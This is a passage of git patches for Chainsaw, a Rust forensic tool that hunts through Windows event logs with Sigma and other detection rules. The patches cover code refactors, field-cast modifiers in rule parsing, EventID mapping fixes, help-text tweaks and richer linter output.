@@ pub fn load_rule(path: &PathBuf) -> crate::Result> { kind: Kind::Sigma, }) .collect() - } else if let Ok(rule) = stalker::load(&path) { + } else if let Ok(rule) = stalker::load(path) { vec![Rule { chainsaw: Chainsaw { name: rule.tag, @@ -135,7 +135,7 @@ pub fn load_rule(path: &PathBuf) -> crate::Result> { Ok(rules) } -pub fn lint_rule(kind: &Kind, path: &PathBuf) -> crate::Result<()> { +pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result<()> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); @@ -146,7 +146,7 @@ pub fn lint_rule(kind: &Kind, path: &PathBuf) -> crate::Result<()> { unimplemented!() } Kind::Sigma => { - if let Err(e) = sigma::load(&path) { + if let Err(e) = sigma::load(path) { let file_name = match path.to_string_lossy().split('/').last() { Some(e) => e.to_string(), None => path.display().to_string(), @@ -159,7 +159,7 @@ pub fn lint_rule(kind: &Kind, path: &PathBuf) -> crate::Result<()> { } } Kind::Stalker => { - if let Err(e) = stalker::load(&path) { + if let Err(e) = stalker::load(path) { let file_name = match path.to_string_lossy().split('/').last() { Some(e) => e.to_string(), None => path.display().to_string(), diff --git a/src/search.rs b/src/search.rs index 34026405..93e72a83 100644 --- a/src/search.rs +++ b/src/search.rs @@ -35,7 +35,7 @@ impl<'a> Iterator for Iter<'a> { type Item = crate::Result; fn next(&mut self) -> Option { - while let Some(document) = self.documents.next() { + for document in self.documents.by_ref() { let document = match document { Ok(document) => document, Err(e) => { @@ -55,7 +55,7 @@ impl<'a> Iterator for Iter<'a> { .expect("could not get timestamp"); // TODO: Default to RFC 3339 let result = match &document { - Document::Evtx(evtx) => match crate::evtx::Wrapper(&evtx.data).find(&field) { + Document::Evtx(evtx) => match crate::evtx::Wrapper(&evtx.data).find(field) { Some(value) => match value.as_str() { Some(timestamp) => { NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") @@ -64,7 +64,7 @@ impl<'a> Iterator for Iter<'a> { }, None => continue, }, - Document::Json(json) | Document::Xml(json) => match json.find(&field) { + Document::Json(json) | Document::Xml(json) => match json.find(field) { Some(value) => match value.as_str() { Some(timestamp) => { NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") @@ -132,10 +132,10 @@ impl<'a> Iterator for Iter<'a> { Document::Evtx(evtx) => { let wrapper = crate::evtx::Wrapper(&evtx.data); if let Some(expression) = &self.searcher.tau { - if !tau_engine::core::solve(&expression, &wrapper) { + if !tau_engine::core::solve(expression, &wrapper) { continue; } - if self.searcher.regex.len() == 0 { + if self.searcher.regex.is_empty() { return Some(Ok(evtx.data)); } } @@ -145,10 +145,10 @@ impl<'a> Iterator for Iter<'a> { } Document::Json(json) | Document::Xml(json) => { if let Some(expression) = &self.searcher.tau { - if !tau_engine::core::solve(&expression, &json) { + if !tau_engine::core::solve(expression, &json) { continue; } - if self.searcher.regex.len() == 0 { + if self.searcher.regex.is_empty() { return Some(Ok(json)); } } @@ -213,7 +213,7 @@ impl SearcherBuilder { Ok(Searcher { inner: SearcherInner { - regex: regex, + regex, from: self.from.map(|d| DateTime::from_utc(d, Utc)), load_unknown, From e4c82ffe8bfa77ed838cdbf56b7242f9a8a7cacc Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 16:14:43 +0100 Subject: [PATCH 16/77] chore: remove redundant code --- src/file/evtx.rs | 7 ------- 1 file changed, 7 deletions(-) diff --git a/src/file/evtx.rs b/src/file/evtx.rs index 9f2beba1..a7846db0 100644 --- a/src/file/evtx.rs +++ b/src/file/evtx.rs @@ -36,13 +36,6 @@ impl<'a> Document for Wrapper<'a> { // As event logs can store values in a key or complex objects we do some aliasing here for // convenience... match key { - "Event.System.EventID" => { - // FIXME: If `#text` returns text then we need to map this to a u64 otherwise it - // will be ignored... - self.0 - .find("Event.System.EventID.#text") - .or_else(|| self.0.find(key)) - } "Event.System.Provider" => self.0.find("Event.System.Provider_attributes.Name"), "Event.System.TimeCreated" => self .0 From 6d8be41b30418e57d43931850db3cbfb15047371 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 16:36:25 +0100 Subject: [PATCH 17/77] feat: allow for tau field modifiers in search --- src/ext/tau.rs | 55 +++++++++++++++++++++++++++++++++----------------- 1 file changed, 37 insertions(+), 18 deletions(-) diff --git a/src/ext/tau.rs b/src/ext/tau.rs index fe5fd429..e531cc56 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs @@ -2,7 +2,7 @@ use aho_corasick::AhoCorasickBuilder; use serde::de; use serde_yaml::Value as Yaml; use tau_engine::core::parser::{ - parse_identifier, BoolSym, Expression, IdentifierParser, MatchType, Pattern, Search, + parse_identifier, BoolSym, Expression, IdentifierParser, MatchType, MiscSym, Pattern, Search, }; pub fn deserialize_expression<'de, D>(deserializer: D) -> Result @@ -37,61 +37,77 @@ pub fn parse_kv(kv: &str) -> crate::Result { let mut parts = kv.split(": "); let key = parts.next().expect("invalid tau key value pair"); let value = parts.next().expect("invalid tau key value pair"); - // NOTE: This is pinched from tau-engine as it is not exposed. + let mut not = false; + let (field, key) = if key.starts_with("int(") && key.ends_with(")") { + let key = key[4..key.len() - 1].to_owned(); + (Expression::Cast(key.to_owned(), MiscSym::Int), key) + } else if key.starts_with("not(") && key.ends_with(")") { + not = true; + let key = key[4..key.len() - 1].to_owned(); + (Expression::Field(key.to_owned()), key) + } else if key.starts_with("str(") && key.ends_with(")") { + let key = key[4..key.len() - 1].to_owned(); + (Expression::Cast(key.to_owned(), MiscSym::Str), key) + } else { + (Expression::Field(key.to_owned()), key.to_owned()) + }; + // NOTE: This is pinched from tau-engine as it is not exposed, we then slightly tweak it to + // handle casting in a slightly different way :O + // FIXME: The tau-engine is not able to cast string expressions, I need to fix this upstream :/ let identifier = value.to_owned().into_identifier()?; let expression = match identifier.pattern { Pattern::Equal(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::Equal, Box::new(Expression::Integer(i)), ), Pattern::GreaterThan(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::GreaterThan, Box::new(Expression::Integer(i)), ), Pattern::GreaterThanOrEqual(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::GreaterThanOrEqual, Box::new(Expression::Integer(i)), ), Pattern::LessThan(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::LessThan, Box::new(Expression::Integer(i)), ), Pattern::LessThanOrEqual(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::LessThanOrEqual, Box::new(Expression::Integer(i)), ), Pattern::FEqual(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::Equal, Box::new(Expression::Float(i)), ), Pattern::FGreaterThan(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::GreaterThan, Box::new(Expression::Float(i)), ), Pattern::FGreaterThanOrEqual(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::GreaterThanOrEqual, Box::new(Expression::Float(i)), ), Pattern::FLessThan(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::LessThan, Box::new(Expression::Float(i)), ), Pattern::FLessThanOrEqual(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::LessThanOrEqual, Box::new(Expression::Float(i)), ), - Pattern::Any => Expression::Search(Search::Any, key.to_owned()), - Pattern::Regex(c) => Expression::Search(Search::Regex(c), key.to_owned()), + Pattern::Any => Expression::Search(Search::Any, key), + Pattern::Regex(c) => Expression::Search(Search::Regex(c), key), Pattern::Contains(c) => Expression::Search( if identifier.ignore_case { Search::AhoCorasick( @@ -106,7 +122,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { } else { Search::Contains(c) }, - key.to_owned(), + key, ), Pattern::EndsWith(c) => Expression::Search( if identifier.ignore_case { @@ -122,7 +138,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { } else { Search::EndsWith(c) }, - key.to_owned(), + key, ), Pattern::Exact(c) => Expression::Search( if !c.is_empty() && identifier.ignore_case { @@ -138,7 +154,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { } else { Search::Exact(c) }, - key.to_owned(), + key, ), Pattern::StartsWith(c) => Expression::Search( if identifier.ignore_case { @@ -154,8 +170,11 @@ pub fn parse_kv(kv: &str) -> crate::Result { } else { Search::StartsWith(c) }, - key.to_owned(), + key, ), }; + if not { + return Ok(Expression::Negate(Box::new(expression))); + } Ok(expression) } From dfff10744a9ff51686efd32e1f557c118d6a7037 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Wed, 8 Jun 2022 11:18:23 +0100 Subject: [PATCH 18/77] fix: make sure we cast EventID to int as sometimes its a string... --- Cargo.lock | 10 +++++----- mappings/sigma-event-logs.yml | 18 +++++++++--------- src/ext/tau.rs | 10 ++++++++-- 3 files changed, 22 insertions(+), 16 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 367822c9..9dd61ebe 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -1186,9 +1186,9 @@ dependencies = [ [[package]] name = "tau-engine" -version = "1.4.1" +version = "1.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f32fcbd3e364cb39fac2f5753f3b21df0dcf246eacec2953453400fad64c9db8" +checksum = "b5db9c91ce2460b6438363850f0a3c57ef01410da9d041f865c99b2725c5bff4" dependencies = [ "aho-corasick 0.7.18", "lazy_static", @@ -1316,11 +1316,11 @@ dependencies = [ [[package]] name = "tracing-core" -version = "0.1.26" +version = "0.1.27" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f54c8ca710e81886d498c2fd3331b56c93aa248d49de2222ad2742247c60072f" +checksum = "7709595b8878a4965ce5e87ebf880a7d39c9afc6837721b21a5a816a8117d921" dependencies = [ - "lazy_static", + "once_cell", ] [[package]] diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index c24a503a..2e9acbcd 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml @@ -14,7 +14,7 @@ groups: - name: Suspicious Process Creation timestamp: Event.System.TimeCreated filter: - EventID: 1 + int(EventID): 1 Provider: Microsoft-Windows-Sysmon fields: - from: Provider @@ -48,7 +48,7 @@ groups: - name: Suspicious Network Connection timestamp: Event.System.TimeCreated filter: - EventID: 3 + int(EventID): 3 Provider: Microsoft-Windows-Sysmon fields: - from: Provider @@ -92,7 +92,7 @@ groups: - name: Suspicious Image Load timestamp: Event.System.TimeCreated filter: - EventID: 7 + int(EventID): 7 Provider: Microsoft-Windows-Sysmon fields: - from: Provider @@ -117,7 +117,7 @@ groups: - name: Suspicious File Creation timestamp: Event.System.TimeCreated filter: - EventID: 11 + int(EventID): 11 Provider: Microsoft-Windows-Sysmon fields: - from: Provider @@ -142,7 +142,7 @@ groups: - name: Suspicious Registry Event timestamp: Event.System.TimeCreated filter: - EventID: 13 + int(EventID): 13 Provider: Microsoft-Windows-Sysmon fields: - from: Provider @@ -170,7 +170,7 @@ groups: - name: Suspicious Service Installed timestamp: Event.System.TimeCreated filter: - EventID: 7045 + int(EventID): 7045 Provider: Service Control Manager fields: - from: Provider @@ -196,7 +196,7 @@ groups: - name: Suspicious Command Line timestamp: Event.System.TimeCreated filter: - EventID: 4688 + int(EventID): 4688 Provider: Microsoft-Windows-Security-Auditing fields: - from: Provider @@ -225,7 +225,7 @@ groups: - name: Suspicious Powershell ScriptBlock timestamp: Event.System.TimeCreated filter: - EventID: 4104 + int(EventID): 4104 Provider: Microsoft-Windows-PowerShell fields: - from: Provider @@ -247,7 +247,7 @@ groups: - name: Suspicious Scheduled Task Created timestamp: Event.System.TimeCreated filter: - EventID: 4698 + int(EventID): 4698 Provider: Microsoft-Windows-Security-Auditing fields: - from: Provider diff --git a/src/ext/tau.rs b/src/ext/tau.rs index e531cc56..f98467ff 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs @@ -37,6 +37,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { let mut parts = kv.split(": "); let key = parts.next().expect("invalid tau key value pair"); let value = parts.next().expect("invalid tau key value pair"); + let mut cast = false; let mut not = false; let (field, key) = if key.starts_with("int(") && key.ends_with(")") { let key = key[4..key.len() - 1].to_owned(); @@ -46,6 +47,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { let key = key[4..key.len() - 1].to_owned(); (Expression::Field(key.to_owned()), key) } else if key.starts_with("str(") && key.ends_with(")") { + cast = true; let key = key[4..key.len() - 1].to_owned(); (Expression::Cast(key.to_owned(), MiscSym::Str), key) } else { @@ -106,8 +108,8 @@ pub fn parse_kv(kv: &str) -> crate::Result { BoolSym::LessThanOrEqual, Box::new(Expression::Float(i)), ), - Pattern::Any => Expression::Search(Search::Any, key), - Pattern::Regex(c) => Expression::Search(Search::Regex(c), key), + Pattern::Any => Expression::Search(Search::Any, key, cast), + Pattern::Regex(c) => Expression::Search(Search::Regex(c), key, cast), Pattern::Contains(c) => Expression::Search( if identifier.ignore_case { Search::AhoCorasick( @@ -123,6 +125,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { Search::Contains(c) }, key, + cast, ), Pattern::EndsWith(c) => Expression::Search( if identifier.ignore_case { @@ -139,6 +142,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { Search::EndsWith(c) }, key, + cast, ), Pattern::Exact(c) => Expression::Search( if !c.is_empty() && identifier.ignore_case { @@ -155,6 +159,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { Search::Exact(c) }, key, + cast, ), Pattern::StartsWith(c) => Expression::Search( if identifier.ignore_case { @@ -171,6 +176,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { Search::StartsWith(c) }, key, + cast, ), }; if not { From adf3d4349f5a5074d383f04eff285647cd693d15 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Sun, 12 Jun 2022 00:29:46 +0100 Subject: [PATCH 19/77] Tweaking help and progress message output - Changed help message for a few parameters - Added a check to error out when no files are found in the provided directory - Made the -r parameter require the mapping parameter for hunt --- src/file/mod.rs | 14 ++++++++++---- src/main.rs | 21 ++++++++++++++++----- 2 files changed, 26 insertions(+), 9 deletions(-) diff --git a/src/file/mod.rs b/src/file/mod.rs index 08dee20b..c05621e2 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -77,12 +77,18 @@ impl Reader { _ => { if load_unknown { if skip_errors { - cs_eyellowln!("file type is not currently supported - {}", extension); + cs_eyellowln!( + "file type is not currently supported - {}", + file.display() + ); Ok(Self { parser: Parser::Unknown, }) } else { - anyhow::bail!("file type is not currently supported - {}", extension) + anyhow::bail!( + "file type is not currently supported - {}", + file.display() + ) } } else { Ok(Self { @@ -107,13 +113,13 @@ impl Reader { }); } if skip_errors { - cs_eyellowln!("file type is not known"); + cs_eyellowln!("file type is not known - {}", file.display()); Ok(Self { parser: Parser::Unknown, }) } else { - anyhow::bail!("file type is not known") + anyhow::bail!("file type is not known - {}", file.display()) } } else { Ok(Self { diff --git a/src/main.rs b/src/main.rs index 56069d5a..2daeea76 100644 --- a/src/main.rs +++ b/src/main.rs @@ -33,14 +33,14 @@ enum Command { /// The path to a collection of rules. rules: PathBuf, - /// The paths to hunt through. + /// The paths containing event logs to hunt through. path: Vec, /// A mapping file to hunt with. #[structopt(short = "m", long = "mapping", number_of_values = 1)] mapping: Option>, /// Additional rules to hunt with. - #[structopt(short = "r", long = "rule", number_of_values = 1)] + #[structopt(short = "r", long = "rule", number_of_values = 1, requires("mapping"))] rule: Option>, /// Set the column width for the tabular output. @@ -91,8 +91,8 @@ enum Command { Lint { /// The path to a collection of rules. path: PathBuf, - /// The kind of rule to lint. - #[structopt(long = "kind", default_value = "chainsaw")] + /// The kind of rule to lint: chainsaw, sigma or stalker + #[structopt(long = "kind")] kind: RuleKind, }, @@ -102,7 +102,7 @@ enum Command { #[structopt(required_unless_one=&["regexp", "tau"])] pattern: Option, - /// The paths to search through. + /// The paths containing event logs to hunt through. path: Vec, /// A pattern to search for. @@ -283,6 +283,11 @@ fn run() -> Result<()> { for path in &path { files.extend(get_files(path, &extension, skip_errors)?); } + if files.len() == 0 { + return Err(anyhow::anyhow!( + "No event logs were found in the provided paths", + )); + } let mut detections = vec![]; let pb = cli::init_progress_bar(files.len() as u64, "Hunting".to_string()); for file in &files { @@ -376,8 +381,14 @@ fn run() -> Result<()> { } let mut files = vec![]; for path in &paths { + println!("foo: {}", path.display()); files.extend(get_files(path, &extension, skip_errors)?); } + if files.len() == 0 { + return Err(anyhow::anyhow!( + "No event logs were found in the provided paths" + )); + } let mut searcher = Searcher::builder() .ignore_case(ignore_case) .load_unknown(load_unknown) From ec2936967f9c08e73aace958dec208e03e68f7de Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Sun, 12 Jun 2022 00:39:12 +0100 Subject: [PATCH 20/77] removing troubleshooting message --- src/main.rs | 1 - 1 file changed, 1 deletion(-) diff --git a/src/main.rs b/src/main.rs index 2daeea76..decb8087 100644 --- a/src/main.rs +++ b/src/main.rs @@ -381,7 +381,6 @@ fn run() -> Result<()> { } let mut files = vec![]; for path in &paths { - println!("foo: {}", path.display()); files.extend(get_files(path, &extension, skip_errors)?); } if files.len() == 0 { From 8bb381cc3ceef2ab1ab3f5dc9a630d6f0cebf638 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Mon, 13 Jun 2022 23:09:48 +0100 Subject: [PATCH 21/77] feat: improve linter output and also bring in the new tau engine improvements and enable its optimisations. --- Cargo.lock | 16 ++++++------ src/ext/tau.rs | 14 ++++++++--- src/lib.rs | 2 +- src/main.rs | 48 ++++++++++++++++++++++++++++------- src/rule/chainsaw.rs | 13 +++++++++- src/rule/mod.rs | 60 ++++++++++++++++++++++++++++++++------------ 6 files changed, 114 insertions(+), 39 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 9dd61ebe..507b9d06 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -1041,9 +1041,9 @@ checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" [[package]] name = "semver" -version = "1.0.9" +version = "1.0.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8cb243bdfdb5936c8dc3c45762a19d12ab4550cdc753bc247637d4ec35a040fd" +checksum = "a41d061efea015927ac527063765e73601444cdc344ba855bc7bd44578b25e1c" dependencies = [ "serde", ] @@ -1186,9 +1186,9 @@ dependencies = [ [[package]] name = "tau-engine" -version = "1.5.0" +version = "1.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b5db9c91ce2460b6438363850f0a3c57ef01410da9d041f865c99b2725c5bff4" +checksum = "28a9cf722f2c09f4a81b8367b0329a36067e845904e19ccee432b204ab96d191" dependencies = [ "aho-corasick 0.7.18", "lazy_static", @@ -1293,9 +1293,9 @@ dependencies = [ [[package]] name = "tracing" -version = "0.1.34" +version = "0.1.35" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5d0ecdcb44a79f0fe9844f0c4f33a342cbcbb5117de8001e6ba0dc2351327d09" +checksum = "a400e31aa60b9d44a52a8ee0343b5b18566b03a8321e0d321f695cf56e940160" dependencies = [ "cfg-if", "pin-project-lite", @@ -1364,9 +1364,9 @@ checksum = "7fcfc827f90e53a02eaef5e535ee14266c1d569214c6aa70133a624d8a3164ba" [[package]] name = "uuid" -version = "1.1.1" +version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c6d5d669b51467dcf7b2f1a796ce0f955f05f01cafda6c19d6e95f730df29238" +checksum = "dd6469f4314d5f1ffec476e05f17cc9a78bc7a27a6a857842170bdf8d6f98d2f" dependencies = [ "getrandom 0.2.6", "serde", diff --git a/src/ext/tau.rs b/src/ext/tau.rs index f98467ff..79ee31ae 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs @@ -2,7 +2,7 @@ use aho_corasick::AhoCorasickBuilder; use serde::de; use serde_yaml::Value as Yaml; use tau_engine::core::parser::{ - parse_identifier, BoolSym, Expression, IdentifierParser, MatchType, MiscSym, Pattern, Search, + parse_identifier, BoolSym, Expression, IdentifierParser, MatchType, ModSym, Pattern, Search, }; pub fn deserialize_expression<'de, D>(deserializer: D) -> Result @@ -41,7 +41,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { let mut not = false; let (field, key) = if key.starts_with("int(") && key.ends_with(")") { let key = key[4..key.len() - 1].to_owned(); - (Expression::Cast(key.to_owned(), MiscSym::Int), key) + (Expression::Cast(key.to_owned(), ModSym::Int), key) } else if key.starts_with("not(") && key.ends_with(")") { not = true; let key = key[4..key.len() - 1].to_owned(); @@ -49,7 +49,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { } else if key.starts_with("str(") && key.ends_with(")") { cast = true; let key = key[4..key.len() - 1].to_owned(); - (Expression::Cast(key.to_owned(), MiscSym::Str), key) + (Expression::Cast(key.to_owned(), ModSym::Str), key) } else { (Expression::Field(key.to_owned()), key.to_owned()) }; @@ -109,7 +109,9 @@ pub fn parse_kv(kv: &str) -> crate::Result { Box::new(Expression::Float(i)), ), Pattern::Any => Expression::Search(Search::Any, key, cast), - Pattern::Regex(c) => Expression::Search(Search::Regex(c), key, cast), + Pattern::Regex(c) => { + Expression::Search(Search::Regex(c, identifier.ignore_case), key, cast) + } Pattern::Contains(c) => Expression::Search( if identifier.ignore_case { Search::AhoCorasick( @@ -120,6 +122,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { .build(vec![c.clone()]), ), vec![MatchType::Contains(c)], + identifier.ignore_case, ) } else { Search::Contains(c) @@ -137,6 +140,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { .build(vec![c.clone()]), ), vec![MatchType::EndsWith(c)], + identifier.ignore_case, ) } else { Search::EndsWith(c) @@ -154,6 +158,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { .build(vec![c.clone()]), ), vec![MatchType::Exact(c)], + identifier.ignore_case, ) } else { Search::Exact(c) @@ -171,6 +176,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { .build(vec![c.clone()]), ), vec![MatchType::StartsWith(c)], + identifier.ignore_case, ) } else { Search::StartsWith(c) diff --git a/src/lib.rs b/src/lib.rs index 41187182..cfc722e2 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -5,7 +5,7 @@ pub(crate) use anyhow::Result; pub use file::{evtx, get_files, Reader}; pub use hunt::{Hunter, HunterBuilder}; -pub use rule::{lint_rule, load_rule, sigma, Kind as RuleKind}; +pub use rule::{chainsaw::Filter, lint_rule, load_rule, sigma, Kind as RuleKind}; pub use search::{Searcher, SearcherBuilder}; pub use write::{set_writer, Format, Writer, WRITER}; diff --git a/src/main.rs b/src/main.rs index 56069d5a..658e2ebb 100644 --- a/src/main.rs +++ b/src/main.rs @@ -10,7 +10,8 @@ use chrono_tz::Tz; use structopt::StructOpt; use chainsaw::{ - cli, get_files, lint_rule, load_rule, set_writer, Format, Hunter, RuleKind, Searcher, Writer, + cli, get_files, lint_rule, load_rule, set_writer, Filter, Format, Hunter, RuleKind, Searcher, + Writer, }; #[derive(StructOpt)] @@ -94,6 +95,9 @@ enum Command { /// The kind of rule to lint. #[structopt(long = "kind", default_value = "chainsaw")] kind: RuleKind, + /// Output tau logic. + #[structopt(short = "t", long = "tau")] + tau: bool, }, /// Search through event logs for specific event IDs and/or keywords @@ -313,26 +317,52 @@ fn run() -> Result<()> { detections.len() ); } - Command::Lint { path, kind } => { + Command::Lint { path, kind, tau } => { init_writer(None, false, false, false)?; if !opts.no_banner { print_title(); } - cs_eprintln!("[+] Validating supplied detection rules..."); + cs_eprintln!("[+] Validating as {} for supplied detection rules...", kind); let mut count = 0; let mut failed = 0; for file in get_files(&path, &None, false)? { - if let Err(e) = lint_rule(&kind, &file) { - failed += 1; - cs_eprintln!("[!] {}", e); - continue; + match lint_rule(&kind, &file) { + Ok(filters) => { + if tau { + cs_eprintln!("[+] Rule {}:", file.to_string_lossy()); + for filter in filters { + let yaml = match filter { + Filter::Detection(mut d) => { + d.expression = tau_engine::core::optimiser::coalesce( + d.expression, + &d.identifiers, + ); + d.identifiers.clear(); + d.expression = + tau_engine::core::optimiser::shake(d.expression, true); + serde_yaml::to_string(&d)? + } + Filter::Expression(_) => { + cs_eyellowln!("[!] Tau does not support visual representation of expressions"); + continue; + } + }; + println!("{}", yaml); + } + } + } + Err(e) => { + failed += 1; + cs_eprintln!("[!] {}", e); + continue; + } } count += 1; } cs_eprintln!( - "[+] Validated {} detection rules ({} were not loaded)", + "[+] Validated {} detection rules out of {}", count, - failed + count + failed ); } Command::Search { diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index dd1725e6..a56f107e 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -8,6 +8,7 @@ use serde::{ Deserialize, Serialize, }; use tau_engine::core::{ + optimiser, parser::{Expression, Pattern}, Detection, }; @@ -196,6 +197,16 @@ pub fn load(rule: &Path) -> crate::Result { let mut contents = String::new(); file.read_to_string(&mut contents)?; - let rule: Rule = serde_yaml::from_str(&contents)?; + let mut rule: Rule = serde_yaml::from_str(&contents)?; + rule.filter = match rule.filter { + Filter::Detection(mut detection) => { + detection.expression = + optimiser::coalesce(detection.expression, &detection.identifiers); + detection.identifiers.clear(); + detection.expression = optimiser::shake(detection.expression, true); + Filter::Detection(detection) + } + Filter::Expression(expression) => Filter::Expression(optimiser::shake(expression, true)), + }; Ok(rule) } diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 2afbb2f8..3819b4e9 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,3 +1,4 @@ +use std::fmt; use std::path::Path; use std::str::FromStr; @@ -5,7 +6,7 @@ use serde::{Deserialize, Serialize}; use crate::file::Kind as FileKind; -pub use self::chainsaw::Rule as Chainsaw; +pub use self::chainsaw::{Filter, Rule as Chainsaw}; pub use self::sigma::Rule as Sigma; pub use self::stalker::Rule as Stalker; @@ -27,6 +28,16 @@ impl Default for Kind { } } +impl fmt::Display for Kind { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Chainsaw => write!(f, "chainsaw"), + Self::Sigma => write!(f, "sigma"), + Self::Stalker => write!(f, "stalker"), + } + } +} + impl FromStr for Kind { type Err = anyhow::Error; @@ -92,7 +103,7 @@ pub fn load_rule(path: &Path) -> crate::Result> { fields: vec![], - filter: chainsaw::Filter::Detection(rule.tau.detection), + filter: chainsaw::Filter::Detection(rule.tau.optimise(true, true).detection), aggregate: None, }, @@ -123,7 +134,7 @@ pub fn load_rule(path: &Path) -> crate::Result> { fields: vec![], - filter: chainsaw::Filter::Detection(rule.tau.detection), + filter: chainsaw::Filter::Detection(rule.tau.optimise(true, true).detection), aggregate: None, }, @@ -135,18 +146,32 @@ pub fn load_rule(path: &Path) -> crate::Result> { Ok(rules) } -pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result<()> { +pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); } } - match kind { - Kind::Chainsaw => { - unimplemented!() - } - Kind::Sigma => { - if let Err(e) = sigma::load(path) { + let detections = match kind { + Kind::Chainsaw => match chainsaw::load(path) { + Ok(rule) => { + vec![rule.filter] + } + Err(e) => { + let file_name = match path.to_string_lossy().split('/').last() { + Some(e) => e.to_string(), + None => path.display().to_string(), + }; + anyhow::bail!("{:?}: {}", file_name, e); + } + }, + Kind::Sigma => match sigma::load(path) { + Ok(yamls) => yamls + .into_iter() + .filter_map(|y| serde_yaml::from_value::(y).ok()) + .map(|r| Filter::Detection(r.tau.detection)) + .collect(), + Err(e) => { let file_name = match path.to_string_lossy().split('/').last() { Some(e) => e.to_string(), None => path.display().to_string(), @@ -157,16 +182,19 @@ pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result<()> { anyhow::bail!("{:?}: {}", file_name, e); } } - } - Kind::Stalker => { - if let Err(e) = stalker::load(path) { + }, + Kind::Stalker => match stalker::load(path) { + Ok(rule) => { + vec![Filter::Detection(rule.tau.detection)] + } + Err(e) => { let file_name = match path.to_string_lossy().split('/').last() { Some(e) => e.to_string(), None => path.display().to_string(), }; anyhow::bail!("{:?}: {}", file_name, e); } - } - } - Ok(()) + }, + }; + Ok(detections) } From 470d81fae26864de99d4720cee0f98e84eb6ebda Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Fri, 17 Jun 2022 16:31:30 +0100 Subject: [PATCH 22/77] feat: add support for all of and 1 of in sigma conditions --- src/rule/sigma.rs | 132 ++++++++++++++++++++++++++++++++++++++-------- 1 file changed, 111 insertions(+), 21 deletions(-) diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 478c5f3a..26422967 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -222,38 +222,128 @@ fn prepare(detection: Detection, extra: Option) -> Result condition: Some("of(A, 1)".into()), identifiers, } - } else if let Some(d) = extra { + } else { + let condition = match c { + Yaml::String(c) => c, + Yaml::Sequence(s) => { + if s.len() == 1 { + let x = s.iter().next().expect("could not get condition"); + if let Yaml::String(c) = x { + c + } else { + anyhow::bail!("condition must be a string"); + } + } else { + anyhow::bail!("condition must be a string"); + } + } + _ => anyhow::bail!("condition must be a string"), + }; let 